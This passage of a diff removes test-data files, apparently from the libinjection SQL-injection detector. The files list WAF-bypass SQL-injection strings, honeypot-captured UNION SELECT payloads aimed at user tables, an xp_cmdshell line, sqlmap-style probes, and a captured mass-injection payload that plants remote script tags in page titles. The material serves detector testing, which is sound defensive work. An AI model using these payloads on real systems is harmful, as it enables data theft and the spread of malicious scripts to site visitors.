SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)
|
||||
|
||||
|
||||
#
|
||||
# Slide 74 (MySQL Obfuscation)
|
||||
#
|
||||
1.UNION SELECT 2
|
||||
3.2UNION SELECT 2
|
||||
1e0UNION SELECT 2
|
||||
SELECT\N/0.e3UNION SELECT 2
|
||||
1e1AND-0.0UNION SELECT 2
|
||||
1/*!12345UNION/*!31337SELECT/*!table_name*/
|
||||
{ts 1}UNION SELECT.`` 1.e.table_name
|
||||
SELECT $.`` 1.e.table_name
|
||||
SELECT{_ .``1.e.table_name}
|
||||
SELECT LightOS . ``1.e.table_name LightOS)
|
||||
SELECT information_schema 1337.e.tables 13.37e.table_name
|
||||
SELECT 1 from information_schema 9.e.table_name
|
||||
|
||||
#
|
||||
# Slide 75 (MSSQL Obfuscation)
|
||||
#
|
||||
.1UNION SELECT 2
|
||||
1.UNION SELECT.2alias
|
||||
1e0UNION SELECT 2
|
||||
1e1AND-1=0.0UNION SELECT 2
|
||||
SELECT 0xUNION SELECT 2
|
||||
SELECT\UNION SELECT 2
|
||||
\1UNION SELECT 2
|
||||
SELECT 1FROM[table]WHERE\1=\1AND\1=\1
|
||||
SELECT"table_name"FROM[information_schema].[tables]
|
||||
|
||||
#
|
||||
# Slide 76 (Oracle Obfuscation)
|
||||
#
|
||||
1FUNION SELECT 2
|
||||
1DUNION SELECT 2
|
||||
SELECT 0x7461626c655f6e616d65 FROM all_tab_tables
|
||||
SELECT CHR(116) || CHR(97) || CHR(98) FROM all_tab_tables
|
||||
SELECT%00table_name%00FROM%00all_tab_tables
|
||||
|
||||
#
|
||||
# Slide 77 (Bypassing Firewalls, General Tips)
|
||||
#
|
||||
1 UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
|
||||
CASE WHEN BINARY TRUE THEN TRUE END IS NOT UNKNOWN HAVING TRUE FOR UPDATE
|
||||
|
||||
#
|
||||
# Slide 78 (Modsecurity)
|
||||
#
|
||||
-2 div 1 union all #in%0a#between comments%0a#in%0a#between comments%0aselect 0x00, 0x41 like/*!31337table_name*/,3 from information_schema.tables limit 1
|
||||
|
||||
#
|
||||
# Slide 79 (Modsecurity)
|
||||
#
|
||||
CASE WHEN BINARY TRUE THEN TRUE END IS UNKNOWN FOR UPDATE UNION SELECT MATTRESSES
|
||||
|
||||
#
|
||||
# Slide 80 (Fortinet)
|
||||
# (Skipped since specific to Fortinet)
|
||||
#S%A0E%B1L%C2E%D3C%E4T%F6 1 U%FFNION SEL%FFECT 2
|
||||
|
||||
#
|
||||
# Slide 81 (GreenSQL)
|
||||
#
|
||||
-1 UNION SELECT table_name FROM information_schema.tables limit 1
|
||||
1 AND 1=0 UNION SELECT table_name FROM information_schema.tables limit 1
|
||||
1 AND 1=0.e1 UNION SELECT table_name FROM information_schema.tables limit 1
|
||||
1 AND 1= binary 1 UNION SELECT table_name FROM information_schema.tables limit 1
|
||||
IF((SELECT mid(table_name,1,1) FROM information_schema.tables limit 1) =‘C’,1,2)
|
||||
|
||||
#
|
||||
# Slide 83 (libinjection)
|
||||
#
|
||||
-1 UNION SELECT table_name Websec FROM information_schema.tables LIMIT 1
|
||||
-1 UNION%0ASELECT table_name FROM information_schema.tables LIMIT 1
|
||||
|
||||
# note changed "FROM table" to "FROM table_name"
|
||||
# and "column" to "column_name"
|
||||
-1fUNION SELECT column_name FROM table_name
|
||||
|
||||
1; DECLARE @test AS varchar(20); EXEC master.dbo.xp_cmdshell 'cmd'
|
||||
-[id] UNION SELECT table_name FROM information_schema.tables LIMIT 1
|
||||
{d 2} UNION SELECT table_name FROM information_schema.tables LIMIT 1
|
||||
|
||||
#
|
||||
# Slide 84 (libinjection)
|
||||
#
|
||||
1 between 1 AND`id` having 0 union select table_name from information_schema.tables
|
||||
1 mod /*!1*/ union select table_name from information_schema.tables--
|
||||
true is not unknown for update union select table_name from information_schema.tables
|
||||
test'-1/1/**/union(select table_name from information_schema.tables limit 1,1)
|
||||
-1 union select @``"", table_name from information_schema.tables
|
||||
-1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables
|
||||
$.``.id and 0 union select table_name from information_schema.tables
|
||||
-(select @) is unknown having 1 UNION select table_name from information_schema.tables
|
||||
/*!911111*//*!0*/union select table_name x from information_schema.tables limit 1
|
||||
-1.for update union select table_name from information_schema.tables limit 1
|
||||
-0b01 union select table_name from information_schema.tables limit 1
|
||||
1<binary 1>2 union select table_name from information_schema.tables limit 1
|
||||
-1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1
|
||||
|
||||
|
File diff suppressed because one or more lines are too long
|
@ -1,24 +0,0 @@
|
|||
#
|
||||
# http://blog.spiderlabs.com/2011/12/honeypot-alert-sql-injection-scanning-update-filter-evasions-detected.html
|
||||
#
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C0x33633273366962%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
200%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C6%2C0x33633273366962%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%22%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
4%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users--
|
||||
35022%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
||||
2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C2%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
|
|
@ -1,12 +0,0 @@
|
|||
#
|
||||
# http://blog.spiderlabs.com/2012/05/mass-sql-injection-payload-analysis.html
|
||||
#
|
||||
21+update+Categories+set+Category_Title=cast(Category_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
|
||||
21+update+Categories+set+Category_Title=REPLACE(cast(Category_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
21+update+Categories+set+Category_Title=REPLACE(cast(Category_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
21+update+Content+set+Content_Title=cast(Content_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
|
||||
21+update+Content+set+Content_Title=REPLACE(cast(Content_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
21+update+Content+set+Content_Title=REPLACE(cast(Content_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
21+update+Homepage+set+Homepage_Title=cast(Homepage_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
|
||||
21+update+Homepage+set+Homepage_Title=REPLACE(cast(Homepage_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
||||
21+update+Homepage+set+Homepage_Title=REPLACE(cast(Homepage_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
|
File diff suppressed because it is too large
|
@ -1,100 +0,0 @@
|
|||
# https://github.com/client9/libinjection/issues/109
|
||||
#
|
||||
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))
|
||||
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))# YxEq
|
||||
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- TscQ
|
||||
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))
|
||||
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))# cDdL
|
||||
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- DIOu
|
||||
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))FsPL)
|
||||
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(45=28,0,5)))))vxEi)
|
||||
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(6715=6715,0,5)))))Hfle) 1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(6958>6957,0,5)))))sets)
|
||||
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "ZBav"="ZBav
|
||||
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "ekgZ" LIKE "ekgZ
|
||||
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- ikjC
|
||||
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "AinJ"="AinJ
|
||||
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "ULyg" LIKE "ULyg
|
||||
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- qLff
|
||||
1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("ReEg" LIKE "ReEg
|
||||
1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("SiLv"="SiLv
|
||||
1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("QwEf"="QwEf
|
||||
1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("acRz" LIKE "acRz
|
||||
1") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("RJVy" LIKE "RJVy
|
||||
1") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("rTWb"="rTWb
|
||||
1")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("AWGS" LIKE "AWGS
|
||||
1")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("ObjI"="ObjI
|
||||
1")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("SgCv" LIKE "SgCv
|
||||
1")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("vYkA"="vYkA
|
||||
1")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("TAfM"="TAfM
|
||||
1")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("YVzA" LIKE "YVzA
|
||||
1"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("XwuG"="XwuG
|
||||
1"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("tENF" LIKE "tENF
|
||||
1"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("fLDW" LIKE "fLDW
|
||||
1"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("lEki"="lEki
|
||||
"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("enRJ" LIKE "enRJ
|
||||
1"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("zhFB"="zhFB
|
||||
1%" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "%"="
|
||||
1%" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "%"="
|
||||
1%") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("%"="
|
||||
1%") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("%"="
|
||||
1%") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("%"="
|
||||
1%")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("%"="
|
||||
1%")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("%"="
|
||||
1%")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("%"="
|
||||
1%"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("%"="
|
||||
1%"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("%"="
|
||||
1%"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("%"="
|
||||
1%' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND '%'='
|
||||
